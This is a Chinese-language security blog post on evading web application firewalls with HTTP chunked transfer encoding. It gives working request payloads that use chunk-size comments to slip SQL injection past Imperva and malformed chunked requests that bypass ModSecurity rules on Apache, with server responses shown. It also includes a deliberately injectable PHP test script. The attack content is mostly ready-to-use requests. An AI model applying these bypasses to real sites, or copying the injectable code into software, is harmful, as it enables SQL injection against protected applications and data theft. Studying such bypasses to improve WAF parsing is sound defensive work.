利用分块传输吊打所有WAF

gclome

原文链接：利用分块传输吊打所有WAF

技巧1 使用注释扰乱分块数据包

一些如Imperva、360等比较好的WAF已经对Transfer-Encoding的分块传输做了处理，可以把分块组合成完整的HTTP数据包，这时直接使用常规的分块传输方法尝试绕过的话，会被WAF直接识别并阻断。

我们可以在[RFC7230]中查看到有关分块传输的定义规范

1. 4.1.  Chunked Transfer Coding
   
2. 
   
3.    The chunked transfer coding wraps the payload body in order to
   
4.    transfer it as a series of chunks, each with its own size indicator,
   
5.    followed by an OPTIONAL trailer containing header fields.  Chunked
   
6.    enables content streams of unknown size to be transferred as a
   
7.    sequence of length-delimited buffers, which enables the sender to
   
8.    retain connection persistence and the recipient to know when it has
   
9.    received the entire message.
   
10. 
    
11.      chunked-body   = *chunk
    
12.                       last-chunk
    
13.                       trailer-part
    
14.                       CRLF
    
15. 
    
16.      chunk          = chunk-size [ chunk-ext ] CRLF
    
17.                       chunk-data CRLF
    
18.      chunk-size     = 1*HEXDIG
    
19.      last-chunk     = 1*("0") [ chunk-ext ] CRLF
    
20. 
    
21.      chunk-data     = 1*OCTET ; a sequence of chunk-size octets
    
22. 
    
23.    The chunk-size field is a string of hex digits indicating the size of
    
24.    the chunk-data in octets.  The chunked transfer coding is complete
    
25.    when a chunk with a chunk-size of zero is received, possibly followed
    
26.    by a trailer, and finally terminated by an empty line.
    
27. 
    
28.    A recipient MUST be able to parse and decode the chunked transfer
    
29.    coding.
    
30. 
    
31. 4.1.1.  Chunk Extensions
    
32. 
    
33.    The chunked encoding allows each chunk to include zero or more chunk
    
34.    extensions, immediately following the chunk-size, for the sake of
    
35.    supplying per-chunk metadata (such as a signature or hash),
    
36.    mid-message control information, or randomization of message body
    
37.    size.
    
38. 
    
39.      chunk-ext      = *( ";" chunk-ext-name [ "=" chunk-ext-val ] )
    
40. 
    
41.      chunk-ext-name = token
    
42.      chunk-ext-val  = token / quoted-string
    
43. 
    
44.    The chunked encoding is specific to each connection and is likely to
    
45.    be removed or recoded by each recipient (including intermediaries)
    
46.    before any higher-level application would have a chance to inspect
    
47.    the extensions.  Hence, use of chunk extensions is generally limited

复制代码

通过阅读规范发现分块传输可以在长度标识处加上分号“;”作为注释，如：

1. 9;kkkkk
   
2. 1234567=1
   
3. 4;ooo=222
   
4. 2345
   
5. 0
   
6. (两个换行)

复制代码

几乎所有可以识别Transfer-Encoding数据包的WAF，都没有处理分块数据包中长度标识处的注释，导致在分块数据包中加入注释的话，WAF就识别不出这个数据包了。

现在我们在使用了Imperva应用防火墙的网站测试常规的分块传输数据包：

1. POST /xxxxxx.jsp HTTP/1.1
   
2. ......
   
3. Transfer-Encoding: Chunked
   
4. 
   
5. 9
   
6. xxxxxxxxx
   
7. 9
   
8. xx=xxxxxx
   
9. 9
   
10. xxxxxxxxx
    
11. 1
    
12. d
    
13. 9
    
14. &a=1  and  
    
15. 3
    
16. 2=2
    
17. 0
    
18. （两个换行）

复制代码

​
返回的结果如下图所示

​

可以看到我们的攻击payload “and 2=2”被Imperva的WAF拦截了。
这时我们将分块传输数据包加入注释符

​

1. POST /xxxxxx.jsp HTTP/1.1
   
2. ......
   
3. Transfer-Encoding: Chunked
   
4. 
   
5. 9
   
6. xxxxxxxxx
   
7. 9
   
8. xx=xxxxxx
   
9. 9
   
10. xxxxxxxxx
    
11. 1;testsdasdsad
    
12. d
    
13. 9;test
    
14. &a=1  and  
    
15. 3;test44444
    
16. 2=2
    
17. 0
    
18. (两个换行)

复制代码

​
返回的结果如下图所示。

​

可以看到Imperva已经不拦截这个payload了。
技巧2 Bypass ModSecurity
众所周知ModSecurity是加载在中间件上的插件，所以不需要理会解析http数据包的问题，因为中间件已经帮它处理完了，那么无论使用常规的分块还是加了注释的分块数据包，ModSecurity都能直接获取到完整的http数据包然后匹配危险关键字，所以一些基于ModSecurity做的WAF产品难道就不受影响吗？
接下来我们在Apache+ModSecurity环境做测试。
sql.php代码如下：

1. <?php
   
2. ini_set("display_errors", "On");
   
3. error_reporting(E_ALL);
   
4. $con = mysql_connect("localhost","root","");
   
5. if (!$con)
   
6. {
   
7. die('Could not connect: ' . mysql_error());
   
8. }
   
9. mysql_select_db("test", $con);
   
10. $id = $_REQUEST["id"];
    
11. $sql = "select * from user where id=$id";
    
12. $result = mysql_query($sql,$con);
    
13. while($row = mysql_fetch_array($result))
    
14. {
    
15. echo $row['name'] . " " . $row['password']."n";
    
16. }
    
17. mysql_close($con);
    
18. print "========GET==========n";
    
19. print_r($_GET);
    
20. print "========POST==========n";
    
21. print_r($_POST);
    
22. ?>
    
23. <a href="sqli.php?id=1"> sdfsdf </a>

复制代码

ModSecurity加载的规则拦截了请求包中的关键字“union”。

下面我们的请求和返回结果如下：

1. 请求:
   
2. http://10.10.10.10/sql.php?id=2%20union
   
3. 
   
4. 返回:
   
5. <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
   
6. <html><head>
   
7. <title>404 Not Found</title>
   
8. </head><body>
   
9. <h1>Not Found</h1>
   
10. <p>The requested URL /sql.php was not found on this server.</p>
    
11. <hr>
    
12. <address>Apache/2.2.15 (CentOS) Server at 10.10.10.10 Port 80</address>
    
13. </body></html>

复制代码

可以看到我们的“union”关键字被拦截了。

接下来我们传输一个畸形的分块数据包看看

1. 请求:
   
2. POST /sql.php?id=2%20union HTTP/1.1
   
3. ......
   
4. Transfer-Encoding: chunked
   
5. 
   
6. 1
   
7. aa
   
8. 0
   
9. (两个换行)
   
10. 
    
11. 返回:
    
12. <title>400 Bad Request</title>
    
13. </head><body>
    
14. <h1>Bad Request</h1>
    
15. <p>Your browser sent a request that this server could not understand.<br />
    
16. </p>
    
17. <hr>
    
18. <address>Apache/2.2.15 (CentOS) Server at 10.10.10.10 Port 80</address>
    
19. </body></html>
    
20. ========GET==========
    
21. Array
    
22. (
    
23. [id] => 2 union
    
24. )
    
25. ========POST==========
    
26. Array
    
27. (
    
28. )

复制代码

可以看到虽然apache报错了，但是因为apache容错很强，所以我们提交的参数依然传到了php，而我们的ModSecurity并没有处理400错误的数据包，最终绕过了ModSecurity。

接下来我们把ModSecurity的规则改为过滤返回数据中包含“root”的字符串，然后在sql.php脚本中加入打印“root”关键字的代码。

接着我们做如下测试：

​

1. 请求：
   
2. http://10.10.10.10/sql.php?id=1
   
3. 
   
4. 返回:
   
5. <html><head>
   
6. <title>403 Forbidden</title>
   
7. </head><body>
   
8. <h1>Forbidden</h1>
   
9. <p>You don't have permission to access /sql.php
   
10. on this server.</p>
    
11. <hr>
    
12. <address>Apache/2.2.15 (CentOS) Server at 10.10.10.10 Port 80</address>
    
13. </body></html>

复制代码

因为sql.php脚本中返回了带有“root”的关键字，所以直接就被ModSecurity拦截了。这时我们改为发送畸形的分块数据包

1. 请求:
   
2. POST /sql.php?id=1 HTTP/1.1
   
3. Host: 10.10.10.10
   
4. Connection: keep-alive
   
5. Content-Type: application/x-www-form-urlencoded
   
6. Transfer-Encoding: chunked
   
7. Content-Length: 16
   
8. 
   
9. 3
   
10. 123
    
11. 1
    
12. 0
    
13. (两个换行)
    
14. 
    
15. 返回:
    
16. <html><head>
    
17. <title>400 Bad Request</title>
    
18. </head><body>
    
19. <h1>Bad Request</h1>
    
20. <p>Your browser sent a request that this server could not understand.<br />
    
21. </p>
    
22. <hr>
    
23. <address>Apache/2.2.15 (CentOS) Server at 10.10.10.10 Port 80</address>
    
24. </body></html>
    
25. root 123456
    
26. ========GET==========
    
27. Array
    
28. (
    
29. [id] => 1
    
30. )
    
31. ========POST==========
    
32. Array
    
33. (
    
34. )

复制代码

通过两个测试可以发现使用畸形的分块数据包可以直接绕过ModSecurity的检测。这个问题我们在2017年4月已提交给ModSecurity官方，但是因为种种问题目前依然未修复。

最后
本文是在《在HTTP协议层面绕过WAF》基础上作了一些简单的补充，文中介绍的方法对于常规的WAF基本上能直接Bypass，并不能绕过Filter、代码层通用防注之流。分块传输还有很多有趣的玩法，欢迎各位朋友一些交流学习。